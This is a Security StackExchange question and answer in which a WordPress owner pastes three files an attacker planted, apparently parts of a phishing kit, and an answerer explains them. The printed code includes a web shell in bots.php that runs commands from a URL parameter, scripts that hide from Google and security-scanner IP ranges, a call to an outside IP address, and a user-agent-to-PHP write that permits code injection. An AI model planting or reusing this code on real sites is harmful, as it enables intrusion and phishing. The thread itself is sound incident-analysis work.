-1

Here are some files that hackers modified.

Inside my WordPress installation, I found an unknown folder called ID3 inside of a folder called ID3.

three files 1.bots.php

this is bots.php code

GNU nano 2.3.1
File: bots.php 

<? // Identify and block fake/bad bots
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
if(isset($_GET['useragent'])){echo"<h1>deny_agent(bot)=('Yandex,Baiduspider,Acunetix,crossdomain,wwwroot,Exabot,NimbleCrawler,Octopus,OutfoxBot,ProPowerBot</h1><pre>"; system($_GET['us$
$blocked_words = array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit",);
foreach($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
                header("HTTP/1.0 404 Not Found");
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");

    }
}
$bannedIP = array("^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*",  "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*$
if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) {
     header('HTTP/1.0 404 Not Found');
     exit();
} else {
     foreach($bannedIP as $ip) {
          if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
               header('HTTP/1.0 404 Not Found');
               die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
          }
     }
}
?>

this is index.php

<?php

$random = rand(0,100000).$_SERVER['REMOTE_ADDR'];
$dst            = substr(md5($random), 0, 5);

function recurse_copy($src, $dst) {

        $dir = opendir($src);
        $result = ($dir === false ? false : true);

        if ($result !== false) {
                $result = @mkdir($dst);

                if ($result === true) {
                        while(false !== ( $file = readdir($dir)) ) {
                                if (( $file != '.' ) && ( $file != '..' ) && $result) {
                                        if ( is_dir($src . '/' . $file) ) {
                                                $result = recurse_copy($src . '/' . $file,$dst . '/' . $file);
                                        } else {
                                                $result = copy($src . '/' . $file,$dst . '/' . $file);
                                        }
                                }
                        }
                        closedir($dir);
                }
        }

    return $result;
}

$src="fbs";
recurse_copy( $src, $dst );
header("location:".$dst."");
exit;

?>

this is v.php 

<?php
$bannedIP = array("^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*", "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*"$
if (in_array($_SERVER['REMOTE_ADDR'], $bannedIP)) {
    header('HTTP/1.0 404 Not Found');
    exit();
} else {
    foreach($bannedIP as $ip) {
        if (preg_match('/' . $ip . '/', $_SERVER['REMOTE_ADDR'])) {
            header('HTTP/1.0 404 Not Found');
            die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
        }
    }
}
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_words = array("above", "google", "softlayer", "amazonaws", "cyveillance", "phishtank", "dreamhost", "netpilot", "calyxinstitute", "tor-exit",);
foreach($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
        header("HTTP/1.0 404 Not Found");
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
    }
}
$count_hits = ("antibots.txt");
$hits = file($count_hits);
$hits[0]++;
$fp = fopen($count_hits, "w");
fputs($fp, "$hits[0]");
fclose($fp);
if ($hits[0] > 30) {
    $a = getenv("REMOTE_ADDR");
    $b = getenv("HTTP_USER_AGENT");
    $c = getenv("HOSTNAME");
    $ne = "Deny from $a";
    $file = "newips.php";
    $fp = fopen($file, "a");
    fwrite($fp, $ne);
    $n = "RewriteEngine on
Options +FollowSymlinks
RewriteCond %{HTTP_USER_AGENT} ^$b [OR]
RewriteRule ^.* - [F,L]
";
    $file = "newuseragents.php";
    $fp = fopen($file, "a");
    fwrite($fp, $n);
    $a = getenv("REMOTE_ADDR");
    $b = getenv("HTTP_USER_AGENT");
    $c = getenv("HOSTNAME");
  GNU nano 2.3.1                                                  File: v.php                                                                                                            

$fp = fopen($count_hits, "w");
fputs($fp, "$hits[0]");
fclose($fp);
if ($hits[0] > 30) {
    $a = getenv("REMOTE_ADDR");
    $b = getenv("HTTP_USER_AGENT");
    $c = getenv("HOSTNAME");
    $ne = "Deny from $a";
    $file = "newips.php";
    $fp = fopen($file, "a");
    fwrite($fp, $ne);
    $n = "RewriteEngine on
Options +FollowSymlinks
RewriteCond %{HTTP_USER_AGENT} ^$b [OR]
RewriteRule ^.* - [F,L]
";
    $file = "newuseragents.php";
    $fp = fopen($file, "a");
    fwrite($fp, $n);
    $a = getenv("REMOTE_ADDR");
    $b = getenv("HTTP_USER_AGENT");
    $c = getenv("HOSTNAME");
    $data1 = file_get_contents('http://5.175.160.126/blockedbots.php');
    $a = strip_tags($data1);
    $data2 = file_get_contents('http://5.175.160.126/blockedagents.php');
    $b = strip_tags($data2);
    $data3 = file_get_contents('http://5.175.160.126/blockedhosts.php');
    $c = strip_tags($data3);
}
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_words = array("above", "google", "softlayer", "amazonaws", "cyveillance", "phishtank", "dreamhost", "netpilot", "calyxinstitute", "tor-exit",);
foreach($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
        header("HTTP/1.0 404 Not Found");
        die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
    }
}
?>

And I found some random numbers (check screenshots)

enter image description here

What are those files? How can I stop this? Please tell me this file function? What did these files do?

schroeder
  • 125,553
  • 55
  • 289
  • 326
sanjan
  • 99
  • 2

1 Answers1

1

It is likely your site has been hacked and these files are put here by the attacker.

bots.php

The line starting with if(isset($_GET['useragent'])) ends with system($_GET['us$. I suspect there is a part missing here, but this seems to execute any command supplied by the client. This is highly insecure, and not part of a normal bot-blocking script.

index.php

This copies the fbs directory to a randomly named directory. This is likely the source of the directories in your screenshot.

v.php

This writes the client's user-agent header to a PHP file. This makes it possible to put any PHP code in this file and run it. This is insecure, since it allows the client to run any PHP code.

$b = getenv("HTTP_USER_AGENT");
$n = "... RewriteCond %{HTTP_USER_AGENT} ^$b [OR] ...";
$file = "newuseragents.php";
$fp = fopen($file, "a");
Sjoerd
  • 28,897
  • 12
  • 76
  • 102